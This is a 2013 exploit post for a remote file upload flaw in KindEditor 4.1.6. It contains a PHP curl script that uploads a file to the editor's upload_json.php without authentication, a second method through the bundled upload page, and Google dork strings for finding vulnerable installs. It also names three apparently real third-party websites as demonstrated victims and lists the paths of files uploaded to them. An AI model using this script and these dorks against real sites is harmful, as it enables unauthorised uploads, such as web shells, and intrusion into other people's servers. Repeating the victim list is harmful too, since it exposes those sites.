facebook facebook twitter rss

KindEditor 4.1.6 Remote File Upload Vulnerability

Author: TUNISIAN CYBER , Published: 16-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: KindEditor 4.1.6 Remote File Upload Vulnerability
[+] Date: 16-12-2013
[+] Category: WebApp
[+] Vendor: https://code.google.com/p/kindeditor/downloads/detail?name=kindeditor-4.1.6.zip&can=2&q=
[+] Google Dork: inurl:"kindeditor/examples/uploadbutton.html"
inurl:"kindeditor/php"
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
Vulenrability in previous versions 3.X-->4.1.5 by KedAns-DZ
http://1337day.com/exploit/20494

Methode 1
Exploit using PHP:
<?php
echo "=============================================== \n"
echo 
"   KindEditor 4.1.6 File Upload Vulenraiblity   \n"
echo 
"                 TUNISIAN CYBER   \n"
echo 
"=============================================== \n\n"
$uploadfile="TUNISIAN.txt";
$ch curl_init("http://127.0.0.1/kindeditor-4.1.6/php/upload_json.php?dir=file");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
       array(
'imgFile'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
  
?>


Methode 2:
Using "uploadbutton.html"
127.0.0.1/path/kindeditor/examples/uploadbutton.html

p0c>http://oi41.tinypic.com/n2g32w.jpg

Demo:
http://staic.qefeng.com/Kindeditor/php/upload_json.php?dir=file
http://www.fkcasings.com/kindeditor/php/upload_json.php?dir=file
http://zijingwang.org//xtw/include/kindeditor/php/upload_json.php?dir=file
===============================
http://staic.qefeng.com/Kindeditor/examples/uploadbutton.html
http://www.fkcasings.com/kindeditor/examples/uploadbutton.html
http://zijingwang.org/xtw/include/kindeditor/examples/uploadbutton.html
===============================
http://staic.qefeng.com//Kindeditor/attached/file/20131217/20131217041625_73120.txt
http://www.fkcasings.com//kindeditor/attached/file/20131216/20131216195330_68287.txt
http://zijingwang.org//xtw/include/kindeditor/attached/file/20131217/20131217041654_12491.txt
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt,sec4ever

Like us on Facebook :